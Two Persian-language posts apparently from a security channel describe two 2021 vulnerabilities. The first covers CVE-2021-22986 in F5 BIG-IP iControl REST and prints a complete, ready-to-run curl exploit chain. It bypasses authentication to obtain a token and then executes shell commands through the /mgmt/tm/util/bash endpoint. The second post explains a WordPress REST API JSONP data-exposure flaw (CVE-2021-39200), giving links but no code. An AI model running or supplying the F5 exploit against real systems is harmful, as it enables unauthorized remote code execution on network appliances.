#F5_iControl #REST Unauthenticated RCE (#SSRF) #CVE_2021_22986
باز هم سرویس های API این بار REST بر روی محصولات BIG-IP که یک آسیب پذیری در سطح Critical در نسخه 16.0x که میتواند منجر به اجرای کد بر روی سرور مربوطه شود، نوع آسیب پذیری SSRF بوده و کد بهره برداری زیر میباشد.

┌──(unk9vvn㉿avi)-[~]
└─$ token=`curl -i -k -s -X $'POST' -H "Host: $TARGET" -H $'Accept-Language: en' -H $'Authorization: Basic YWRtaW46' -H $'Content-Type: application/json' -H $'Content-Length: 109' -H $'Connection: close' -b $'BIGIPAuthCookie=1234' --data-binary $'{\"username\":\"admin\",\x0d\x0a\"userReference\":{},\x0d\x0a\"loginReference\":{\"link\":\"http://$TARGET/mgmt/shared/gossip\"}\x0d\x0a}' "http://$TARGET/mgmt/shared/authn/login" | grep "{" | jq .token.token| sed 's/"//g'`;echo $token;curl -s -H "X-F5-Auth-Token: $token" -H "Content-Type: application/json" "http://$TARGET/mgmt/tm/util/bash" -d '{"command":"run","utilCmdArgs":"-c id"}' | jq .commandResult

https://support.f5.com/csp/article/K03009991
@Unk9vvN
#WordPress 5.4 to 5.8 - #Data_Exposure via #REST_API
یکی از Scope های محبوب شکارچیان باگ وب، سرویس های API هستش مثلا اخیرا روی وبسرویس های مایکروسافتی چندین آسیب پذیری که بروی Functionality های API بوده رخ داده،

از این روی دیگر وبسرویس های رایگانی که بصورت متن باز هستند هم میتونند دارای آسیب پذیری های متعددی در قسمت Backend پردازش Functionality های خود باشند،

همونطور که در تصویر میبینید یکی از توابع وبسرویس REST API که بر روی CMS مشهور Wordpress فعال هستش دارای آسیب پذیری Data Exposure یا بستر قرار داشتن داده ها هستش،

این آسیب پذیری که بر روی تابع ()json_wp_die_handler_ هستش مامور پاسخ به Request های Json Padding یا JSONP است و نتیجتا کنترلی بر callback این درخواست ها نبوده و باعث Leakage اطلاعات حساس میشود.

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39200
https://github.com/WordPress/wordpress-develop/commit/ca4765c62c65acb732b574a6761bf5fd84595706
@Unk9vvN